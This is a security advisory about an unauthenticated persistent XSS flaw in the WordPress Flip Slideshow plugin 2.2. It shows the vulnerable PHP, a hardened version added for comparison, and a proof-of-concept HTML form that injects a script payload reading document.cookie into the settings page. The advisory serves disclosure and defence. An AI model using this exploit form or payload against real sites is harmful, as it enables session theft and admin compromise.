07 Jun

Persistent Cross-Site Scripting (XSS) Vulnerability in Flip Slideshow

The Flip Slideshow plugin has a persistent cross-site scripting (XSS) vulnerability (and possibly other security issues) as of version 2.2.

Due to an issue with code shared among several plugins, which we first found in the Vertical Slideshow plugin, functions intended for Administrator level users in this plugin are accessible to anyone (even if they are not logged in). One of those is save_flp_settings(), which saves values for the plugin’s settings:

public function save_flp_settings()
{
	// No capability or nonce check: any request that reaches this handler is honoured.
	$ops = array();
	foreach($_POST['settings'] as $key => $value)
	{
		// Values are only trimmed, never sanitized, before being stored.
		$ops[$key] = trim($value);
	}
	update_option('flp_settings', $ops);
	/*
	insert xml code part
	*/
}

When the values are output on the plugin’s settings page, /wp-admin/admin.php?page=flipslideshow_settings, through the file /html/settings.php, they are not escaped. For example, the value for “settings[bannerWidth]” is set on line 13:

13
<td><input type="text" name="settings[bannerWidth]"  value="<?php print @$ops['bannerWidth']; ?>" /></td>
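For comparison, here is a hardened counterpart to the two pieces shown above: the save_flp_settings() handler and the settings[bannerWidth] output. This is an added example, not the plugin's code or its eventual fix; the hardened_ function names are hypothetical, and the nonce check assumes the settings form emits wp_nonce_field( 'save_flp_settings' ).

```php
<?php
// Added example (not the plugin's code): hardened versions of the handler and
// the output shown above. Function names prefixed "hardened_" are hypothetical.

function hardened_save_flp_settings() {
    // 1. Capability check. The original has none, so any visitor who reaches the
    //    "task" dispatcher can overwrite the plugin's settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // 2. Nonce check. The proof of concept is a cross-site form post that rides on
    //    the victim's cookies; a per-action nonce makes such a post fail.
    //    Pairs with wp_nonce_field( 'save_flp_settings' ) in the settings form.
    check_admin_referer( 'save_flp_settings' );

    $raw = ( isset( $_POST['settings'] ) && is_array( $_POST['settings'] ) )
        ? $_POST['settings']
        : array();

    // 3. Sanitize on input. The original only trim()s, which leaves markup intact.
    $ops = array();
    foreach ( $raw as $key => $value ) {
        // Only accept option names of the shape the plugin itself uses.
        if ( ! is_string( $key ) || ! preg_match( '/^[A-Za-z0-9_]+$/', $key ) ) {
            continue;
        }
        // bannerWidth is a pixel dimension, so keep only a non-negative integer.
        $ops[ $key ] = ( 'bannerWidth' === $key )
            ? absint( $value )
            : sanitize_text_field( wp_unslash( $value ) );
    }
    update_option( 'flp_settings', $ops );
}

// Output side: escape for the HTML attribute context regardless of what is stored.
// Sanitizing on input is not a substitute for escaping on output; the stored value
// could have been written by an older, unsanitized version of the handler.
function hardened_render_banner_width_field( array $ops ) {
    $width = isset( $ops['bannerWidth'] ) ? $ops['bannerWidth'] : '';
    return '<td><input type="text" name="settings[bannerWidth]" value="'
        . esc_attr( $width ) . '" /></td>';
}
```

With esc_attr() in place, the payload from the proof of concept below is stored as text and rendered inertly inside the value attribute instead of closing it and injecting a script element.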

Proof of Concept

The following proof of concept will cause an alert box with any accessible cookies to be shown on the page /wp-admin/admin.php?page=flipslideshow_settings.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<head>
</head>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=flipslideshow_settings" method="post">
<input type="hidden" name="task" value="save_flp_settings" />
<input type="hidden" name="settings[bannerWidth]" value='"><script>alert(document.cookie);</script>' />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 6/7/2016 – WordPress.org Plugin Directory notified.

Concerned About The Security of The Plugins You Use

When you are a paying customer of our service (you can currently try the service free for the first month), you get to suggest/vote on what plugins we will do security reviews of.
